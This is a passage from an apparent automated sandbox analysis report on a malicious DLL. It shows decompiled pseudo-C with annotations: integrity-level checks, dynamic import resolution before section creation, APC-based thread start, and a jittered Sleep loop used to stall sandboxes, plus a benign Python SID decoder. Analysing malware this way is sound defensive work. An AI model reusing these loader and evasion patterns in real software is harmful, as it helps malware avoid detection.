						if(_v8 != 0) {
							_t46 = E00EC2049(_v8); // heap buffer for the TOKEN_MANDATORY_LABEL
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff)); // last sub-authority of Label.Sid = integrity RID (0x1000 low, 0x2000 medium, 0x3000 high, 0x4000 system)
								}
								E00EC9039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20; // out: integrity RID
				return _v16; // elevated flag
                                                  			}
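E00EC924F reads the integrity level the way the API intends: the last sub-authority of the TOKEN_MANDATORY_LABEL SID is the mandatory RID, and the function falls back to "elevated, medium integrity" (_v16 = 1, _v20 = 0x2000) when the version check fails, which is the correct pre-Vista assumption. The following Python is an added example, not code from this page or from the sample: it decodes a binary SID exactly as the GetSidSubAuthorityCount/GetSidSubAuthority pair walks it, so the same decision can be replayed against a label SID pulled from a memory dump or a token logged by an EDR. The SID byte strings and helper names are constructed for the example.

```python
from __future__ import annotations
import struct

# winnt.h SECURITY_MANDATORY_*_RID values; the SID form is S-1-16-<rid>.
MANDATORY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x3000: "High",
    0x4000: "System",
    0x5000: "ProtectedProcess",
}
SECURITY_MANDATORY_LABEL_AUTHORITY = 16


def parse_sid(blob: bytes) -> tuple[int, int, list[int]]:
    """Decode a binary SID into (revision, identifier_authority, sub_authorities).
    Layout: revision (1 byte), sub-authority count (1 byte), identifier authority
    (6 bytes, big-endian), then `count` little-endian DWORD sub-authorities."""
    if len(blob) < 8:
        raise ValueError("SID too short")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID truncated: sub-authority count exceeds buffer")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack_from(f"<{count}I", blob, 8))
    return revision, authority, subs


def sid_to_string(blob: bytes) -> str:
    revision, authority, subs = parse_sid(blob)
    return "S-" + "-".join(str(x) for x in (revision, authority, *subs))


def integrity_rid(label_sid: bytes) -> int:
    """What E00EC924F computes: *GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1)."""
    _, authority, subs = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY or not subs:
        raise ValueError("not a mandatory-label SID")
    return subs[-1]


def integrity_name(rid: int) -> str:
    # RIDs between the documented steps are legal; report the level floor, as the kernel compares them.
    floor = max((k for k in MANDATORY_LEVELS if k <= rid), default=0)
    return MANDATORY_LEVELS[floor]


def classify_token(is_elevated: bool, label_sid: bytes) -> dict:
    """Replay the function's two outputs: the TokenIsElevated flag and the integrity RID."""
    rid = integrity_rid(label_sid)
    return {"elevated": bool(is_elevated), "integrity_rid": rid, "integrity": integrity_name(rid)}


# Constructed sample inputs: S-1-16-8192 (medium, a normal desktop process) and S-1-16-12288 (high).
MEDIUM_LABEL_SID = bytes.fromhex("0101" "000000000010" "00200000")
HIGH_LABEL_SID = bytes.fromhex("0101" "000000000010" "00300000")

if __name__ == "__main__":
    print(sid_to_string(MEDIUM_LABEL_SID), classify_token(False, MEDIUM_LABEL_SID))
    print(sid_to_string(HIGH_LABEL_SID), classify_token(True, HIGH_LABEL_SID))
```

The truncation check matters when the buffer comes from a dump rather than from GetTokenInformation: the sample trusts the sub-authority count byte because the API sized the buffer for it, but a carved SID may not be complete.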

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00EC9281
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 00EC92A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00EC92B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00EC9301
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00EC92D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00EC92DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00EC92EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 24ef6cf9dd2bbab8b687cfe0e09c72c33e18e8a657a574e929678ceb67e2bbfc
                                                  • Instruction ID: b538e94a7a7e4dd0ea22a9aa5d1001c71ab9f76fbe3d57ec6b09367dce861806
                                                  • Opcode Fuzzy Hash: 24ef6cf9dd2bbab8b687cfe0e09c72c33e18e8a657a574e929678ceb67e2bbfc
                                                  • Instruction Fuzzy Hash: 45215E7590025DFFEB009F95DD85EEEBBB9EB04304F00007AE910B2161D7724E06EB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 272 ec163f-ec168b SysAllocString 273 ec17af-ec17b2 272->273 274 ec1691-ec16bd 272->274 275 ec17bd-ec17c0 273->275 276 ec17b4-ec17b7 SafeArrayDestroy 273->276 280 ec17ac 274->280 281 ec16c3-ec16cf call ec2436 274->281 278 ec17cb-ec17d2 275->278 279 ec17c2-ec17c5 SysFreeString 275->279 276->275 279->278 280->273 281->280 284 ec16d5-ec16e5 281->284 284->280 286 ec16eb-ec1711 IUnknown_QueryInterface_Proxy 284->286 286->280 288 ec1717-ec172b 286->288 290 ec172d-ec1730 288->290 291 ec1769-ec176c 288->291 290->291 292 ec1732-ec1749 StrStrIW 290->292 293 ec176e-ec1773 291->293 294 ec17a3-ec17a8 291->294 295 ec174b-ec1754 call ec52f9 292->295 296 ec1760-ec1763 SysFreeString 292->296 293->294 297 ec1775-ec1780 call ec1a70 293->297 294->280 295->296 302 ec1756-ec175e call ec2436 295->302 296->291 301 ec1785-ec1789 297->301 301->294 303 ec178b-ec1790 301->303 302->296 304 ec179e 303->304 305 ec1792-ec179c 303->305 304->294 305->294
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 00EC1680
                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00EC1702
                                                  • StrStrIW.SHLWAPI(?,006E0069), ref: 00EC1741
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC1763
                                                    • Part of subcall function 00EC52F9: SysAllocString.OLEAUT32(00ECC2B0), ref: 00EC5349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 00EC17B7
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC17C5
                                                    • Part of subcall function 00EC2436: Sleep.KERNELBASE(000001F4), ref: 00EC247E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                  • String ID:
                                                  • API String ID: 2118684380-0
                                                  • Opcode ID: 5776265c08922423d83ebadfb59231fa9e42240fdd513e8e4a42ac59ff88af3f
                                                  • Instruction ID: 28c058556218325304e3a2c892da10aaf7e2d39f6351fe83451ae13f1fd87d25
                                                  • Opcode Fuzzy Hash: 5776265c08922423d83ebadfb59231fa9e42240fdd513e8e4a42ac59ff88af3f
                                                  • Instruction Fuzzy Hash: A4513C76900209EFCB00DFA8C984DAEB7F6FF89340B15986DE515EB220D732AD46CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with their address ranges and notable calls, followed by successor blocks; the executed / not-executed colouring of the interactive graph is not preserved in text)
• 308 401a0f-401a21 call 401de1 -> 311, 312
• 311 401ae2 -> 315
• 312 401a27-401a5c GetModuleHandleA GetProcAddress -> 313, 314
• 313 401ada-401ae0 call 401dfc -> 315
• 314 401a5e-401a72 GetProcAddress -> 313, 316
• 315 401ae9-401af0 (exit)
• 316 401a74-401a88 GetProcAddress -> 313, 318
• 318 401a8a-401a9e GetProcAddress -> 313, 320
• 320 401aa0-401ab4 GetProcAddress -> 313, 321
• 321 401ab6-401ac7 call 401eb5 -> 323
• 323 401acc-401ad1 -> 313, 324
• 324 401ad3-401ad8 -> 315
                                                  C-Code - Quality: 100%
                                                  			E00401A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v8;
                                                  				_Unknown_base(*)()* _t29;
                                                  				_Unknown_base(*)()* _t33;
                                                  				_Unknown_base(*)()* _t36;
                                                  				_Unknown_base(*)()* _t39;
                                                  				_Unknown_base(*)()* _t42;
                                                  				intOrPtr _t46;
                                                  				struct HINSTANCE__* _t50;
                                                  				intOrPtr _t56;
                                                  
				// Resolves five imports by name into a 0x20-byte context block and then hands that block
				// to E00401EB5 (which creates a section via NtCreateSection). The address of each statement
				// is given on the right; import names are read from a table whose base is the value at 0x404150.
				_t56 = E00401DE1(0x20);                                              // 0x00401a1d  HeapAlloc of the context (see E00401DE1)
				if(_t56 == 0) {                                                       // 0x00401a21
					_v8 = 8;                                                          // 0x00401ae2  ERROR_NOT_ENOUGH_MEMORY
				} else {                                                              // 0x00401a27
					_t50 = GetModuleHandleA( *0x404150 + 0x405014);                   // 0x00401a3f  module name at table base + 0x405014
					_v8 = 0x7f;                                                       // 0x00401a4e  ERROR_PROC_NOT_FOUND, returned if any lookup below fails
					_t29 = GetProcAddress(_t50,  *0x404150 + 0x405151);               // 0x00401a55
					 *(_t56 + 0xc) = _t29;                                            // 0x00401a59  context+0x0c: first resolved function
					if(_t29 == 0) {                                                   // 0x00401a5c
						L8:                                                           // 0x00401ada
						E00401DFC(_t56);                                              // 0x00401adb  common failure path: free the context
					} else {                                                          // 0x00401a5e
						_t33 = GetProcAddress(_t50,  *0x404150 + 0x405161);           // 0x00401a6b
						 *(_t56 + 0x10) = _t33;                                       // 0x00401a6f  context+0x10
						if(_t33 == 0) {                                               // 0x00401a72
							goto L8;                                                  // (no code emitted)
						} else {                                                      // 0x00401a74
							_t36 = GetProcAddress(_t50,  *0x404150 + 0x405174);       // 0x00401a81
							 *(_t56 + 0x14) = _t36;                                   // 0x00401a85  context+0x14
							if(_t36 == 0) {                                           // 0x00401a88
								goto L8;                                              // (no code emitted)
							} else {                                                  // 0x00401a8a
								_t39 = GetProcAddress(_t50,  *0x404150 + 0x405189);   // 0x00401a97
								 *(_t56 + 0x18) = _t39;                               // 0x00401a9b  context+0x18
								if(_t39 == 0) {                                       // 0x00401a9e
									goto L8;                                          // (no code emitted)
								} else {                                              // 0x00401aa0
									_t42 = GetProcAddress(_t50,  *0x404150 + 0x40519f); // 0x00401aad
									 *(_t56 + 0x1c) = _t42;                           // 0x00401ab1  context+0x1c: fifth resolved function
									if(_t42 == 0) {                                   // 0x00401ab4
										goto L8;                                      // (no code emitted)
									} else {                                          // 0x00401ab6
										 *((intOrPtr*)(_t56 + 8)) = _a8;              // 0x00401abc  caller-supplied values stored at +4 / +8
										 *((intOrPtr*)(_t56 + 4)) = _a4;              // 0x00401ac2
										_t46 = E00401EB5(_t56, _a12); // executed     // 0x00401ac7  creates the section (NtCreateSection, see APIs below)
										_v8 = _t46;                                   // 0x00401ace  E00401EB5 returns 0 on success, else an error code
										if(_t46 != 0) {                               // 0x00401ad1
											goto L8;                                  // (no code emitted)
										} else {                                      // 0x00401ad3
											 *_a16 = _t56;                            // 0x00401ad6  success: return the context to the caller
										}                                             // 0x00401ad6
									}                                                 // 0x00401ad1
								}                                                     // 0x00401ab4
							}                                                         // 0x00401a9e
						}                                                             // 0x00401a88
					}                                                                 // 0x00401a72
				}                                                                     // 0x00401a5c
				return _v8;                                                           // 0x00401af0
			}

                                                  APIs
                                                    • Part of subcall function 00401DE1: HeapAlloc.KERNEL32(00000000,?,00401556,00000208,00000000,00000000,?,?,?,004016A9,?), ref: 00401DED
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                    • Part of subcall function 00401EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401F12
                                                    • Part of subcall function 00401EB5: memset.NTDLL ref: 00401F34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                  • String ID:
                                                  • API String ID: 1632424568-0
                                                  • Opcode ID: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                  • Instruction ID: a5b725abbf619f5b34b99e3f49f5d91652d314a6d7b06be396a476ddccf995a6
                                                  • Opcode Fuzzy Hash: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                  • Instruction Fuzzy Hash: E9211EB160160AAFD710DFA9DD88E6B7BECEF483447004476E905EB361D774E9018F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with their address ranges and notable calls, followed by successor blocks; the executed / not-executed colouring of the interactive graph is not preserved in text)
• 325 401afa-401b0e -> 326, 327
• 326 401b10-401b11 -> 328, 329
• 327 401b7f-401b8c InterlockedDecrement -> 329, 330
• 328 401b17-401b24 InterlockedIncrement -> 329, 331
• 329 401bcc-401bd3 (exit)
• 330 401b8e-401b94 -> 332, 333
• 331 401b2a-401b3e HeapCreate -> 334, 335
• 332 401bc0-401bc6 HeapDestroy -> 329
• 333 401b96 -> 336
• 334 401b40-401b71 call 4015ee call 4012dc -> 329, 343
• 335 401b7a-401b7d -> 329
• 336 401b9b-401bab SleepEx -> 338, 339
• 338 401bb4-401bba CloseHandle -> 332
• 339 401bad-401bb2 -> 336, 338
• 343 401b73-401b76 -> 335
                                                  C-Code - Quality: 86%
                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                                                  				long _v8;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				char _t9;
                                                  				void* _t10;
                                                  				void* _t18;
                                                  				void* _t23;
                                                  				void* _t36;
                                                  
				// DllMain. _a4 is the module handle, _a8 the fdwReason (1 = DLL_PROCESS_ATTACH, 0 = DLL_PROCESS_DETACH).
				// 0x404108 is an attach reference count, 0x404110 a private heap, 0x40410c the worker thread handle
				// and 0x404118 a "worker still running" flag. The address of each statement is given on the right.
				_push(__ecx);                                                        // 0x00401afd
				_t9 = _a8;                                                           // 0x00401b09
				_v8 = 1;                                                             // 0x00401b0b  default return value TRUE
				if(_t9 == 0) {                                                       // 0x00401b0e  DLL_PROCESS_DETACH
					_t10 = InterlockedDecrement(0x404108);                           // 0x00401b84
					__eflags = _t10;                                                 // 0x00401b8a
					if(_t10 == 0) {                                                  // 0x00401b8c  last detach: tear down
						__eflags =  *0x40410c;                                       // 0x00401b8e
						if( *0x40410c != 0) {                                        // 0x00401b94  worker thread exists
							_t36 = 0x2328;                                           // 0x00401b96  9000 ms budget ...
							while(1) {                                               // 0x00401b9b
								SleepEx(0x64, 1);                                    // 0x00401b9e  ... spent in 100 ms alertable sleeps
								__eflags =  *0x404118;                               // 0x00401ba9
								if( *0x404118 == 0) {                                // 0x00401bab  worker has signalled completion
									break;                                           // (no code emitted)
								}                                                    // (no code emitted)
								_t36 = _t36 - 0x64;                                  // 0x00401bad
								__eflags = _t36;                                     // 0x00401bb0
								if(_t36 > 0) {                                       // 0x00401bb2
									continue;                                        // (no code emitted)
								}                                                    // (no code emitted)
								break;                                               // (no code emitted)  budget exhausted: give up waiting
							}                                                        // 0x00401bb2
							CloseHandle( *0x40410c);                                 // 0x00401bba
						}                                                            // 0x00401bba
						HeapDestroy( *0x404110);                                     // 0x00401bc6
					}                                                                // 0x00401bc6
				} else {                                                             // 0x00401b10
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {            // 0x00401b11  first DLL_PROCESS_ATTACH only
						_t18 = HeapCreate(0, 0x400000, 0); // executed               // 0x00401b31  4 MiB private heap
						_t41 = _t18;                                                 // 0x00401b37
						 *0x404110 = _t18;                                           // 0x00401b39
						if(_t18 == 0) {                                              // 0x00401b3e
							L6:                                                      // 0x00401b7a
							_v8 = 0;                                                 // 0x00401b7a  return FALSE: the load fails
						} else {                                                     // 0x00401b40
							 *0x404130 = _a4;                                        // 0x00401b48  remember the module handle
							asm("lock xadd [eax], edi");                             // 0x00401b4f  atomically set the worker-running flag
							_push( &_a8);                                            // 0x00401b59
							_t23 = E004012DC(E0040111A, E004015EE(_a12, 1, 0x404118, _t41)); // 0x00401b65  start the worker via CreateThread + QueueUserAPC (see E004012DC)
							 *0x40410c = _t23;                                       // 0x00401b6c  thread handle, or 0 on failure
							if(_t23 == 0) {                                          // 0x00401b71
								asm("lock xadd [esi], eax");                         // 0x00401b76  undo the flag
								goto L6;                                             // (no code emitted)
							}                                                        // 0x00401b76
						}                                                            // 0x00401b71
					}                                                                // 0x00401b3e
				}                                                                    // 0x00401b11
				return _v8;                                                          // 0x00401bd3
			}

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00404108), ref: 00401B1C
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401B31
                                                    • Part of subcall function 004012DC: CreateThread.KERNEL32 ref: 004012F3
                                                    • Part of subcall function 004012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                    • Part of subcall function 004012DC: GetLastError.KERNEL32(00000000), ref: 00401313
                                                    • Part of subcall function 004012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                    • Part of subcall function 004012DC: CloseHandle.KERNEL32(00000000), ref: 00401324
                                                    • Part of subcall function 004012DC: SetLastError.KERNEL32(00000000), ref: 0040132D
                                                  • InterlockedDecrement.KERNEL32(00404108), ref: 00401B84
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00401B9E
                                                  • CloseHandle.KERNEL32 ref: 00401BBA
                                                  • HeapDestroy.KERNEL32 ref: 00401BC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                  • String ID:
                                                  • API String ID: 2110400756-0
                                                  • Opcode ID: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                  • Instruction ID: 792522c7080727e056b4609bb1b29018c808fce2ea1d8660a7d1a9546f28a125
                                                  • Opcode Fuzzy Hash: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                  • Instruction Fuzzy Hash: 5421A4B1600205ABC7109F69ED89E1A7FB8F7A4351710413BF615F72F1E7789D408B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00EC6A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
				// Initialisation with a timing-jittered delay loop (the "stalling execution ending in API Sleep call"
				// signature). The address of each statement is given on the right.
				_t26 = __edx;                                                        // 0x00ec6a56
				_push(__ecx);                                                        // 0x00ec6a5c
				_push(__ecx);                                                        // 0x00ec6a5d
				_t10 = HeapCreate(0, 0x400000, 0); // executed                       // 0x00ec6a69  4 MiB private heap
				 *0xecd238 = _t10;                                                   // 0x00ec6a71
				if(_t10 != 0) {                                                      // 0x00ec6a76
					 *0xecd1a8 = GetTickCount();                                     // 0x00ec6a86  start time
					_t12 = E00EC8F10(_a4);                                           // 0x00ec6a8b
					if(_t12 == 0) {                                                  // 0x00ec6a92
						do {                                                         // 0x00ec6a94
							GetSystemTimeAsFileTime( &_v12);                         // 0x00ec6a99  64-bit FILETIME, 100 ns ticks
							_t14 = SwitchToThread();                                 // 0x00ec6a9f  0 or 1, added to the exponent below
							_t23 = _v12.dwHighDateTime;                              // 0x00ec6aa5
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;   // 0x00ec6aaf  decompiler rendering of the 64-bit FILETIME >> 7
							_push(0);                                                // 0x00ec6ab3  divisor high dword
							_push(9);                                                // 0x00ec6ab5  divisor low dword: 9
							_push(_t23 >> 7);                                        // 0x00ec6aba  dividend high dword
							_push(_t16);                                             // 0x00ec6abb  dividend low dword
							L00ECB226();                                             // 0x00ec6abc  _aullrem: _t16 = (FILETIME >> 7) % 9, i.e. 0..8
							_t33 = _t14 + _t16;                                      // 0x00ec6ac1  exponent n in 0..9
							_t18 = E00EC7E03(_a4, _t33);                             // 0x00ec6ac7  loop continues while this returns 1
							_t19 = 2;                                                // 0x00ec6ad0
							_t25 = _t33;                                             // 0x00ec6ad1
							Sleep(_t19 << _t33); // executed                         // 0x00ec6ad6  Sleep(2 << n): 2 ms .. 1024 ms per iteration
						} while (_t18 == 1);                                         // 0x00ec6adc
						if(E00EC6B96(_t25) != 0) {                                   // 0x00ec6ae8
							 *0xecd260 = 1; // executed                              // 0x00ec6aea
						}                                                            // 0x00ec6aea
						_t12 = E00EC225B(_t26); // executed                          // 0x00ec6af4
					}                                                                // 0x00ec6af4
				} else {                                                             // 0x00ec6a78
					_t12 = 8;                                                        // 0x00ec6a7a  ERROR_NOT_ENOUGH_MEMORY
				}                                                                    // 0x00ec6a7a
				return _t12;                                                         // 0x00ec6afe
			}

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A69
                                                  • GetTickCount.KERNEL32 ref: 00EC6A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC6A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00EC6ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6AD6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 1b976b7205e7a001cf54ad430cc3b4bc11336c3e119be92f0753ec7f3d623172
                                                  • Instruction ID: ffcc55c0f838c0ab64b920145b0348ec0e97f57350a54e7812d1f380d55b7755
                                                  • Opcode Fuzzy Hash: 1b976b7205e7a001cf54ad430cc3b4bc11336c3e119be92f0753ec7f3d623172
                                                  • Instruction Fuzzy Hash: 2611E572A04200BFE724AB75ED0BF5B76D8DB44350F10453CF909F61A0EAB3D8078666
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Control-flow graph nodes: 359 (4012dc-4012fd, CreateThread); 360 (401334-401337); 361 (4012ff-401310, QueueUserAPC); 362 (401312-401333, GetLastError, TerminateThread, CloseHandle, SetLastError). Edges: 359->360, 359->361, 361->360, 361->362, 362->360.
                                                  C-Code - Quality: 100%
                                                  			E004012DC(long _a4, DWORD* _a12) {
                                                  				_Unknown_base(*)()* _v0;
                                                  				void* _t4;
                                                  				long _t6;
                                                  				long _t11;
                                                  				void* _t13;
                                                  
                                                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, _a12); // executed
                                                  				_t13 = _t4;
                                                  				if(_t13 != 0) {
                                                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                                                  					if(_t6 == 0) {
                                                  						_t11 = GetLastError();
                                                  						TerminateThread(_t13, _t11);
                                                  						CloseHandle(_t13);
                                                  						_t13 = 0;
                                                  						SetLastError(_t11);
                                                  					}
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 004012F3
                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                  • GetLastError.KERNEL32(00000000), ref: 00401313
                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                  • CloseHandle.KERNEL32(00000000), ref: 00401324
                                                  • SetLastError.KERNEL32(00000000), ref: 0040132D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                  • String ID:
                                                  • API String ID: 3832013932-0
                                                  • Opcode ID: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                  • Instruction ID: f5107841804292b3b09bf02656a39ff33859dc1d0ce8cd21f452a75bd9d4c98c
                                                  • Opcode Fuzzy Hash: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                  • Instruction Fuzzy Hash: 68F05E32502220FBE6115FA0AD08F9FBF6CFB08712F004425FA01B1164C7348A008BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 57%
                                                  			E00EC225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E00EC550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0xecd25c; // 0x2000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0xecd25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0xecd164(0, 2); // executed
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E00EC3D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
